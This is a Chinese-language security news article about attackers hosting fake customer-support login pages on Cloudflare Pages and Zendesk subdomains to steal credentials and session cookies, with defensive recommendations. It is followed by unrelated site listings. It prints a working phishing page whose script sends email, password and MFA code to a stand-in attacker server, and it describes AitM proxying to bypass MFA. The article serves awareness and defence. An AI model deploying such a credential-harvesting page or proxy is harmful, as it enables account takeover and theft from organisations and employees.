钓鱼新变种:攻击者借Cloudflare Pages与Zendesk“合法外衣”伪造客服门户,企业凭证安全防线告急

一、一封“工单升级”邮件,竟成企业账户失守的导火索

2025年11月下旬,华东某跨境电商公司IT部门收到一封看似来自内部Zendesk支持系统的邮件。邮件主题为“【紧急】您的工单 #8472 已触发SLA超时,请立即验证身份以继续处理”。邮件内容专业、排版规范,附带一个“查看详情”的按钮,链接指向 support-verify.yourbrand.zendesk.com。

点击后,页面加载迅速,品牌Logo、配色方案、字体样式与该公司真实客服门户几乎一致。用户被要求“重新登录以确认身份”,并输入一次性验证码(MFA)。操作完成后,系统提示“验证成功,工单正在处理中”。

然而,短短两小时后,该公司财务系统后台出现异常登录记录——攻击者利用窃取的会话Cookie,绕过了MFA,直接访问了包含供应商付款信息的敏感模块。

这并非孤例。过去三个月,全球至少有17起类似事件被公开披露,涉及金融、制造、SaaS服务等多个行业。而这些钓鱼页面的共同点在于:它们并非托管在可疑域名或黑产服务器上,而是“光明正大”地运行在 Cloudflare Pages 和 Zendesk Help Center 这类主流、可信的云服务平台之上。

二、合法平台成“钓鱼温床”?攻击者如何钻空子

传统反钓鱼机制高度依赖域名信誉体系。例如,企业邮件网关会自动拦截来自 .xyz、.top 或已知恶意IP的链接;浏览器也会对列入黑名单的站点弹出警告。但当钓鱼页面出现在 *.pages.dev(Cloudflar Pages默认子域)或 *.zendesk.com(Zendesk官方托管域)之下时,这些防线瞬间失效。

“这相当于小偷穿上了保安制服,在大厦正门刷卡进入。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“攻击者不再需要注册域名、租用VPS、配置SSL证书——这些繁琐且易被追踪的步骤,如今只需一个免费账号和几行代码即可完成。”

技术拆解:一页代码,即可构建高仿真钓鱼门户

以 Cloudflare Pages 为例,攻击者只需以下几步:

注册 Cloudflare 账号(无需实名,支持匿名邮箱);

创建静态网站项目,上传仿冒页面HTML/CSS/JS;

绑定自定义子路径或使用默认 *.pages.dev 域名;

嵌入数据回传逻辑(如通过 Webhook 或代理转发)。

下面是一个简化版的钓鱼页面核心代码片段(仅用于技术分析,严禁滥用):

<!-- fake-support.html -->

<!DOCTYPE html>

<html>

<head>

<meta charset="UTF-8">

<title>【YourBrand】客服支持中心</title>

<link rel="stylesheet" href="/assets/yourbrand-style.css">

</head>

<body>

<div>

<img src="/logo.png" alt="YourBrand Logo">

<h2>请验证您的账户以继续处理工单 #8472</h2>

<form id="phishForm">

<input type="email" name="email" placeholder="企业邮箱" required>

<input type="password" name="password" placeholder="密码" required>

<input type="text" name="mfa_code" placeholder="一次性验证码 (MFA)" required>

<button type="submit">提交验证</button>

</form>

</div>

<script>

document.getElementById('phishForm').addEventListener('submit', async (e) => {

e.preventDefault();

const data = new FormData(e.target);

// 将凭证发送至攻击者控制的Webhook(如Discord、Telegram Bot或自建API)

await fetch('https://attacker-controlled-server.com/collect', {

method: 'POST',

body: JSON.stringify(Object.fromEntries(data)),

headers: {'Content-Type': 'application/json'}

});

// 模拟“验证成功”,跳转至真实Zendesk页面以消除怀疑

window.location.href = 'https://yourbrand.zendesk.com/hc/zh-cn';

});

</script>

</body>

</html>

更高级的攻击甚至会部署 反向代理(Reverse Proxy) 或 中间人(AitM, Adversary-in-the-Middle) 架构。例如,攻击者搭建一个代理层,将用户请求实时转发至真实Zendesk页面,同时截获登录过程中的 Cookie、Session Token 和 MFA 响应。这种方式下,用户看到的是完全真实的界面,连 HTTPS 锁图标都毫无破绽。

“这种攻击最难防御的地方在于:页面本身是‘干净’的,行为却极度危险。”芦笛强调,“传统WAF或内容扫描工具很难识别一段看似正常的HTML表单是否用于窃取凭证。”

三、国际案例频发,国内企业敲响警钟

2025年9月,美国网络安全公司 Proofpoint 披露了一起针对科技企业的钓鱼活动。攻击者利用 Cloudflare Pages 托管伪造的 Okta 登录页,并通过 LinkedIn 私信发送“安全警报”链接。受害者点击后,被引导至 okta-verify.pages.dev,页面完美复刻 Okta UI,甚至动态加载受害者公司Logo(通过URL参数注入)。该活动在两周内窃取了超过200个企业账户凭证。

同年10月,欧洲某银行遭遇类似攻击。钓鱼页面托管于 Zendesk 子域,伪装成“GDPR数据请求处理中心”,诱导员工上传包含客户身份证与银行卡信息的“合规文件”。事后调查发现,攻击者通过 Zendesk 的自定义主题功能注入恶意 JavaScript,实现数据外泄。

这些案例虽发生于海外,但对国内企业具有极强的警示意义。随着中国企业加速出海、广泛采用 SaaS 工具(如 Zendesk、Intercom、Freshdesk),以及越来越多开发者使用 Cloudflare Pages 部署官网或文档站,攻击面正在同步扩大。

“我们监测到,2025年下半年,国内针对企业客服流程的钓鱼尝试同比增长320%。”芦笛透露,“其中约35%的样本使用了主流云平台托管,且近半数能绕过企业现有邮件安全网关。”

四、为何传统防御失效?三大认知盲区亟待破除

盲区一:“可信域名=安全内容”

许多企业安全策略仍将“域名白名单”作为核心防线。例如,允许员工访问 *.zendesk.com、*.cloudflare.com 等。但正如前文所述,这些平台允许用户自定义内容,域名可信 ≠ 页面可信。

盲区二:“MFA万能论”

不少企业认为启用多因素认证(MFA)即可高枕无忧。然而,在 AitM 攻击模式下,攻击者可实时代理用户与真实服务之间的通信,在用户完成MFA验证的瞬间窃取有效会话,从而完全绕过二次验证。

盲区三:“静态页面无害论”

安全团队常认为静态HTML页面无法执行复杂攻击。但现代钓鱼页面可通过 <script> 标签加载外部资源、调用浏览器 API(如 navigator.credentials.get() 尝试提取已保存密码)、甚至利用 Service Worker 实现持久化监听。

五、技术对抗升级:从“堵漏洞”到“重构信任模型”

面对新型钓鱼威胁,专家建议企业采取多层次防御策略,核心在于 “零信任”原则 与 “行为驱动的安全”。

1. 严格限制第三方托管内容的访问权限

对 Cloudflare Pages、GitHub Pages、Netlify 等平台实施 URL路径级白名单,而非简单放行整个域名。

使用 内容安全策略(CSP) 限制页面可加载的脚本来源。例如:

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;

可有效阻止钓鱼页面加载外部数据回传脚本。

2. 强制高风险操作使用浏览器隔离或专用终端

对于涉及凭证输入、敏感数据上传的操作(如登录客服系统、提交工单附件),应通过 远程浏览器隔离(RBI) 或 虚拟应用容器 执行。即使页面被攻破,恶意代码也无法接触本地设备或网络。

3. 在通信链路中加入可验证签名

企业可在官方邮件或私信中嵌入 深度链接(Deep Link) 并附加数字签名。例如:

https://support.yourbrand.com/ticket/8472?sig=HMAC_SHA256(key, "8472")

用户点击后,目标页面需验证签名有效性,否则拒绝加载。此举可防止攻击者伪造“工单通知”。

4. 部署基于会话行为的MFA增强保护

即便会话Cookie被盗,也可通过以下机制阻断横向移动:

绑定设备指纹:将会话与浏览器 User-Agent、Canvas Hash、WebGL Renderer 等特征绑定;

实施短暂会话有效期:敏感操作需重新认证;

监控异常行为:如同一会话短时间内从不同国家登录,自动触发MFA挑战。

六、安全不是终点,而是持续博弈的过程

“网络钓鱼的本质从未改变——利用人性弱点。”芦笛总结道,“但攻击者的技术手段正在快速进化,从垃圾邮件到AI语音诈骗,再到如今的‘合法托管钓鱼’,每一步都在试探防御体系的边界。”

他呼吁企业摒弃“一次性加固”的思维,转而建立 动态感知-快速响应-持续教育 的闭环机制。例如,定期开展“红蓝对抗”演练,模拟 Cloudflare Pages 钓鱼场景;在IT支持流程中嵌入“二次确认”环节(如工单升级需电话核实);对员工进行“可疑链接识别”培训——不仅看域名,更要查页面行为。

与此同时,云服务商也需承担更多责任。芦笛建议 Cloudflare、Zendesk 等平台:

加强对新注册项目的自动化内容扫描;

对包含登录表单、敏感字段的页面实施人工审核;

提供安全标签(Security Tagging) 功能,允许企业标记“官方唯一支持入口”。

结语:在信任与怀疑之间,寻找安全的平衡点

当一个链接来自 *.zendesk.com,我们是否还应本能地信任它?当页面加载速度飞快、UI设计精美,我们是否就放松警惕?

这场攻防战的答案,或许不在于技术本身,而在于我们如何重新定义“可信”。在公共互联网日益复杂的今天,真正的安全,始于对“理所当然”的质疑。

而对于每一个企业而言,保护客户与员工的数据,不仅是技术责任,更是商业伦理的底线。在这场没有硝烟的战争中,唯有保持清醒、持续进化,方能在钓鱼者的“合法外衣”之下,守住那道看不见却至关重要的防线。

编辑:芦笛(公共互联网反网络钓鱼工作组)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1177645.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2026年西安有实力的全屋定制实力厂家排行榜单,床/油工/小红砖/小青瓦/全屋定制/旧房改造,全屋定制公司口碑推荐榜 - 品牌推荐师

行业洞察:全屋定制进入“柔性生产+场景化服务”新阶段 随着消费升级与居住需求多元化,全屋定制行业正从“标准化产品输出”向“个性化空间解决方案”转型。2025年数据显示,国内全屋定制市场规模突破3200亿元,其中西…

2026年1月蒸汽防爆烘箱厂家推荐排行榜,大型蒸汽防爆烘箱,高温蒸汽防爆烘箱,苏州蒸汽防爆烘箱,蒸汽防爆烘箱价格参数深度解析与选购指南 - 企业推荐官【官方】

2026年1月蒸汽防爆烘箱厂家推荐排行榜,大型蒸汽防爆烘箱,高温蒸汽防爆烘箱,苏州蒸汽防爆烘箱,蒸汽防爆烘箱价格参数深度解析与选购指南 在化工、新能源、复合材料、制药等对生产安全有着严苛要求的行业中,蒸汽防爆…

伪装成“对账单”的远控木马:Coinbase钓鱼新套路暴露Windows端点安全盲区

一、一封“对账单”邮件&#xff0c;如何变成加密钱包的“催命符”&#xff1f;2025年11月初&#xff0c;全球知名网络安全公司卡巴斯基&#xff08;Kaspersky&#xff09;披露了一起针对加密货币交易平台Coinbase用户的新型钓鱼攻击。这起事件看似普通——受害者收到一封声称来…

市场上优质的短视频矩阵厂家口碑推荐榜,ai数字人矩阵/GEO排名/短视频矩阵,短视频矩阵源头厂家推荐 - 品牌推荐师

短视频营销已成为企业数字化转型的核心战场,但市场上系统同质化严重、效果参差不齐的问题日益凸显。据行业调研数据显示,超60%的企业在短视频矩阵搭建中遭遇“内容生产效率低”“跨平台数据割裂”“ROI难以追踪”等痛…

【详解】使用java解决-一球从100米高度自由落下,每次落地后反跳回原高度的一半;再落下,求它在第10次落地时,共经过多少米?第10次反弹多高?

使用Java解决&#xff1a;一球从100米高度自由落下&#xff0c;每次落地后反跳回原高度的一半问题描述假设有一个小球从100米的高度自由落下&#xff0c;每次落地后都会反弹到原高度的一半。要求计算这个小球在第10次落地时&#xff0c;总共经过了多少米的距离&#xff0c;并且…

留学科研机构怎么选?2026年最新聚焦申请效果与学术价值的终极选择指南 - 品牌推荐

2026年,在留学申请竞争日益激烈的背景下,具备高含金量的科研经历已成为学生斩获名校录取、获取奖学金的核心竞争力之一。随着全球顶尖院校对申请者学术潜力的考察愈发深入,留学科研服务机构的技术实力、师资深度与成…

Claude Agent Skills 实战指南:从原理到自动化生成的最佳实践

大家好&#xff0c;我是玄姐。一、核心摘要 (Executive Summary)继 MCP (Model Context Protocol) 之后&#xff0c;Anthropic 推出的 Claude Skills 进一步完善了 Agent 的生态版图。如果说 MCP 是 Agent 的“手脚”&#xff08;工具与连接&#xff09;&#xff0c;那么 Skill…

java-SSM345的网上图书购物销售_旧书回收vue-springboot

目录具体实现截图项目概述技术架构核心功能创新点应用价值系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;具体实现截图 项目概述 基于Java的SSM框架与Spring Boot结合Vue.js开发的网上图书购物销售及旧书回收…

基于数据科学的校园心理咨询系统的设计与实现开题报告

基于数据科学的校园心理咨询系统的设计与实现开题报告 一、选题背景与意义 &#xff08;一&#xff09;选题背景 随着社会竞争的日益激烈与教育理念的不断升级&#xff0c;当代大学生面临着学业压力、就业焦虑、人际关系困扰、情感问题、自我认知困惑等多重心理挑战&#xff0c…

主动配电网短期负荷预测重构 以IEEE33节点为算例,有迭代图,各个节点在重构前的电压幅值及重...

主动配电网短期负荷预测重构 以IEEE33节点为算例&#xff0c;有迭代图&#xff0c;各个节点在重构前的电压幅值及重构前后电压幅值的对比图&#xff0c;优化前后网络损耗数值对比&#xff0c;重构优化开断支路具体情况&#xff0c;以及在具体某节点处接入分布式电源的容量。 有…

有没有一款真正适合新手,又足够稳定,能长期使用的 Linux 桌面系统?

在企业 IT 运维和开发环境中&#xff0c;我们经常被问到一个问题&#xff1a; 有没有一款“真正适合新手&#xff0c;又足够稳定&#xff0c;能长期使用的 Linux 桌面系统”&#xff1f; 在 2026 年初&#xff0c;这个问题的答案依然清晰而坚定——Linux Mint。 随着 Linux Min…

java-ssm346线上买菜系统买菜优选系统vue-springboot

目录具体实现截图线上买菜系统摘要技术实现要点系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;具体实现截图 线上买菜系统摘要 该系统基于Java SSM框架与VueSpringBoot技术栈&#xff0c;构建了一个高效便捷…

java-SSM354的高校网上报名系统vue-springboot

目录具体实现截图高校网上报名系统摘要系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;具体实现截图 高校网上报名系统摘要 该系统基于Java SSM框架&#xff08;SpringSpring MVCMyBatis&#xff09;与Vue.js…

基于数据挖掘的电商用户行为分析系统的开题报告

基于数据挖掘的电商用户行为分析系统的开题报告 一、选题背景与意义 &#xff08;一&#xff09;选题背景 在数字经济飞速发展的浪潮下&#xff0c;电商行业迎来规模化扩张与精细化运营并存的新阶段。我国电商市场交易规模持续攀升&#xff0c;线上消费已成为居民日常消费的主要…

电梯的坠落:一个关于信任、工程与安全的深度剖析

目录 一、引言&#xff1a;日常的垂直旅程与潜藏的恐惧 二、电梯的机械心脏&#xff1a;动力、制动与速度的奥秘 三、钢铁巨人的守护神&#xff1a;多重安全保障的层层叠加 3.1 速度超速限制器与安全钳&#xff1a;最后的防线 3.2 制动器&#xff1a;静止的力量与紧急的刹车…

java-SSM355的网上购物商城vue投诉统计-springboot

目录具体实现截图系统概述技术架构投诉统计功能数据处理流程系统优化应用价值系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;具体实现截图 系统概述 基于Java的SSM&#xff08;SpringSpringMVCMyBatis&#…

SpringBoot 自研「轻量级 API 防火墙」:单机内嵌,支持在线配置

&#x1f449; 这是一个或许对你有用的社群&#x1f431; 一对一交流/面试小册/简历优化/求职解惑&#xff0c;欢迎加入「芋道快速开发平台」知识星球。下面是星球提供的部分资料&#xff1a; 《项目实战&#xff08;视频&#xff09;》&#xff1a;从书中学&#xff0c;往事上…

强烈安利10个AI论文网站,研究生轻松搞定论文格式规范!

强烈安利10个AI论文网站&#xff0c;研究生轻松搞定论文格式规范&#xff01; AI 工具助力论文写作&#xff0c;高效又专业 在研究生阶段&#xff0c;论文写作是不可避免的重要环节&#xff0c;而随着人工智能技术的不断发展&#xff0c;AI 工具已经成为许多学生提升效率、优化…

基于智能推荐的卫生健康系统的设计与实现任务书

基于智能推荐的卫生健康系统的设计与实现任务书 一、任务名称 基于智能推荐的卫生健康系统的设计与实现 二、任务目的 本任务旨在设计并实现一套基于智能推荐技术的卫生健康系统&#xff0c;解决传统健康管理系统服务同质化、推荐精准度不足等问题。通过整合多源健康数据&#…

java-SSM356的小说阅读下载网站-springboot

目录具体实现截图项目概述技术架构核心功能创新点应用价值系统所用技术介绍写作提纲源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;具体实现截图 项目概述 基于Java的SSM框架&#xff08;SpringSpringMVCMyBatis&#xff09;与Spring…